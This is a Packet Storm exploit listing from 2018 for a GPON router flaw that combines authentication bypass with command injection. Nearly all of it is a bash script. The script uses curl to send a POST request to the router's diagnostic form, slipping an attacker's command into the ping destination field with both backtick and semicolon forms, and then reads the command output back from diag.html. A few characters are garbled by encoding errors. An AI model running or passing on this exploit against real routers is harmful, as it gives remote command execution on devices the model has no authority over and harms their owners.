Lucene search

K
packetstormVpnmentorPACKETSTORM:147482
HistoryMay 04, 2018 - 12:00 a.m.

GPON Router Authentication Bypass / Comand Injection

2018-05-0400:00:00
vpnmentor
packetstormsecurity.com
222

0.974 High

EPSS

Percentile

99.9%

`#!/bin/bash  
  
echo "[+] Sending the Commanda| "  
# We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices  
curl -k -d "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=\`$2\`;$2&ipv=0" $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null  
echo "[+] Waitinga|."  
sleep 3  
echo "[+] Retrieving the ouputa|."  
curl -k $1/diag.html?images/ 2>/dev/null | grep adiag_result = a | sed -e as/\\n/\n/ga  
  
`